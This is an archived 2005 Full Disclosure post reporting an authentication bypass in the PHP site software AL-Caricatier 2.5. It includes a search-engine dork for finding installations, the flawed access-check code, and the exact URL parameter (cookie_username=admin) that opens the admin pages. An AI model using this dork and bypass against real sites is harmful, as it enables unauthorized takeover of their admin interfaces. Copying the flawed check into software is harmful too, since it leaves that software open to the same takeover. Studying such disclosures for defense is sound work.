Full Disclosure mailing list archives
Vulnerability in AL-Caricatier, V.2.5 And Prior Versions
From: "God Of Death (G.O.D)" <mohajali2k4 () gmail com>
Date: Sat, 22 Oct 2005 18:41:06 +0200
Vulnerability in AL-Caricatier,V.2.5 Hello... i found a vulneribility in an program called AL-Caricatier it's an arabic program site: http://www.php-ar.com Vulnerability: Login Bypass GoogleDork: inurl:view_caricatier. php Vunlerability in an included file called ss.php which resides in the admin directory... if($cookie_username){ echo""; }else{ echo"<font face='tahoma' size='2'>You Didn't Sign in لم تقم بتسجيل الدخول</b>"; echo"<meta http-equiv='Refresh' content='1; url=admin_login.php'>"; EXIT; } the admin directory is protected user and password but u can bypass them by going to this link: www.victim.com/view_caricatier.php<http://www.victim.com/view_caricatier.php> To bypass: www.victim.com/admin/welcome.php?cookie_username=admin<http://www.victim.com/admin/welcome.php?cookie_username=admin> or any of the admin files instead of welcome.php like : add-flashFile.php caricatier_add.php delete_cat.php and u r in the admin interface... -- (r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF Genuises....(c)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerability in AL-Caricatier, V.2.5 And Prior Versions God Of Death (G.O.D) (Oct 22)